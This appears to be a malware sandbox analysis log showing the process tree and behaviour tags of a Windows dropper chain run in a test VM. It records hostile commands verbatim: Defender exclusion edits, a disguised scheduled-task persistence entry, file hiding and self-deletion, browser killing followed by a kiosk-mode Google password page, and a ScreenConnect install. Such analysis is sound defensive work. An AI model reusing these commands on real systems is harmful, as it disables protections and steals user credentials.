PID 556 wrote to memory of 4224  556 skotes.exe  119  (3 events)
PID 2284 wrote to memory of 4528  2284 NN9Dd7c.exe  120  (3 events)
PID 2284 wrote to memory of 5076  2284 NN9Dd7c.exe  121  (2 events)
PID 5076 wrote to memory of 2416  5076 244e0736f6f94ca18cd319153573a00b.exe  123  (2 events)
PID 2416 wrote to memory of 3400  2416 msedge.exe  124  (2 events)
PID 2416 wrote to memory of 4212  2416 msedge.exe  125  (7 events)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process
7756 attrib.exe
7836 attrib.exe
4224 attrib.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:3000
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe"C:\Users\Admin\AppData\Local\Temp\36113a3c12cb6d303cdf560916665146e6fb8a6f8bca8a79cce6472fbf01611c.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p6D27.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\p6D27.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\R5B56.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\R5B56.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1V40F8.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1V40F8.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1704 -
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"7⤵
- Executes dropped EXE
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"C:\Users\Admin\AppData\Local\Temp\1017321001\kz8ZdyP.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:400
-
-
-
C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"C:\Users\Admin\AppData\Local\Temp\1017666001\NN9Dd7c.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\prrhri"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3144
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3388
-
-
C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe"C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\prrhri\595994f5cc9c4c769929b462827bc67e.exe" & rd /s /q "C:\ProgramData\AS26FU3EKF37" & exit8⤵
- System Location Discovery: System Language Discovery
PID:1936 -
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4884
-
-
-
-
C:\prrhri\244e0736f6f94ca18cd319153573a00b.exe"C:\prrhri\244e0736f6f94ca18cd319153573a00b.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe643e46f8,0x7ffe643e4708,0x7ffe643e47189⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:29⤵PID:4212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:89⤵PID:3888
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:19⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:19⤵PID:740
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:19⤵PID:5576
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:19⤵PID:5568
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:19⤵PID:6936
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:19⤵PID:6984
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:89⤵PID:7296
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,7326446893190304568,5695372237155542151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
PID:6152
C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"C:\Users\Admin\AppData\Local\Temp\1017680001\ga70pjP.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\98a59bd0eed9222b\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3744
C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4224
C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"C:\Users\Admin\AppData\Local\Temp\1017712001\57dcd7e51c.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7652
C:\Users\Admin\AppData\Local\Temp\1017716001\9a1c193d0b.exe"C:\Users\Admin\AppData\Local\Temp\1017716001\9a1c193d0b.exe"6⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7384
C:\Users\Admin\AppData\Local\Temp\1017717001\00f883d031.exe"C:\Users\Admin\AppData\Local\Temp\1017717001\00f883d031.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7008
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"7⤵PID:5912
C:\Windows\system32\mode.commode 65,108⤵PID:7340
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e file.zip -p24291711423417250691697322505 -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:392
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_7.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3476
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_6.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5200
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_5.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5564
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_4.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7280
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_3.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6592
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_2.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5384
C:\Users\Admin\AppData\Local\Temp\main\7z.exe7z.exe e extracted/file_1.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4464
C:\Windows\system32\attrib.exeattrib +H "in.exe"8⤵
- Views/modifies file attributes
PID:7836
C:\Users\Admin\AppData\Local\Temp\main\in.exe"in.exe"8⤵
- Executes dropped EXE
PID:8124
C:\Windows\SYSTEM32\attrib.exeattrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe9⤵
- Views/modifies file attributes
PID:7756
C:\Windows\SYSTEM32\attrib.exeattrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe9⤵
- Views/modifies file attributes
PID:4224
C:\Windows\SYSTEM32\schtasks.exeschtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE9⤵
- Scheduled Task/Job: Scheduled Task
PID:6580
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ping 127.0.0.1; del in.exe9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5672
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" 127.0.0.110⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6028
C:\Users\Admin\AppData\Local\Temp\1017718001\002e33e6e2.exe"C:\Users\Admin\AppData\Local\Temp\1017718001\002e33e6e2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6380
C:\Users\Admin\AppData\Local\Temp\1017719001\4320ee3d91.exe"C:\Users\Admin\AppData\Local\Temp\1017719001\4320ee3d91.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5960
C:\Users\Admin\AppData\Local\Temp\1017720001\64711675d3.exe"C:\Users\Admin\AppData\Local\Temp\1017720001\64711675d3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5676
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5756
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3564
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6488
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6748
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6744
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:7376
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:6856
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {df9a0afb-b984-4990-95b1-3973291a7e76} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" gpu9⤵PID:7712
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2456 -parentBuildID 20240401114208 -prefsHandle 2432 -prefMapHandle 2420 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4c87cda-4953-4029-8f18-0d10aaba4349} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" socket9⤵PID:8032
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3448 -childID 1 -isForBrowser -prefsHandle 3440 -prefMapHandle 3436 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d2952fa4-cb64-4f1b-a5ef-0ef74a8c5551} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:1036
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3832 -childID 2 -isForBrowser -prefsHandle 3824 -prefMapHandle 3176 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7847304-c413-4931-b1ba-742aef1b0c47} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6516
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4588 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4616 -prefMapHandle 4612 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14004282-bac4-4290-ace8-f4b37b5193c1} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" utility9⤵
- Checks processor information in registry
PID:5924
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5264 -prefMapHandle 5300 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {05011831-b136-43cd-a3d3-0e87643fa6f3} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6228
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 4 -isForBrowser -prefsHandle 5456 -prefMapHandle 5460 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3af0dfcf-ccc9-425a-a807-1f2dc344be78} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:7780
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0aab67ed-1f1b-4e5a-8e5d-81ac94709ad2} 6856 "\\.\pipe\gecko-crash-server-pipe.6856" tab9⤵PID:6200
C:\Users\Admin\AppData\Local\Temp\1017721001\7d3ca92efa.exe"C:\Users\Admin\AppData\Local\Temp\1017721001\7d3ca92efa.exe"6⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7872
C:\Users\Admin\AppData\Local\Temp\1017722001\cfb5c42bfd.exe"C:\Users\Admin\AppData\Local\Temp\1017722001\cfb5c42bfd.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6452
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\xnjuo"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:7928
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6712
C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe"C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:7768
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\xnjuo\bbfa9a48763748409ab9f84a4b4d1cca.exe" & rd /s /q "C:\ProgramData\LN7YM79RI58Q" & exit8⤵
- System Location Discovery: System Language Discovery
PID:5192
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2652
C:\xnjuo\716b2bf6d0ea4bc89dd192d17a90ce2f.exe"C:\xnjuo\716b2bf6d0ea4bc89dd192d17a90ce2f.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:5464
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://apps.microsoft.com/store/detail/9MSZ40SLW145?ocid=&referrer=psi8⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4324
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffe5c9546f8,0x7ffe5c954708,0x7ffe5c9547189⤵PID:3068
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:29⤵PID:7148
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:39⤵PID:900
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:89⤵PID:5608
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:19⤵PID:2024
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:19⤵PID:5196
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,536989012237632395,15378699331863260335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:89⤵PID:6792
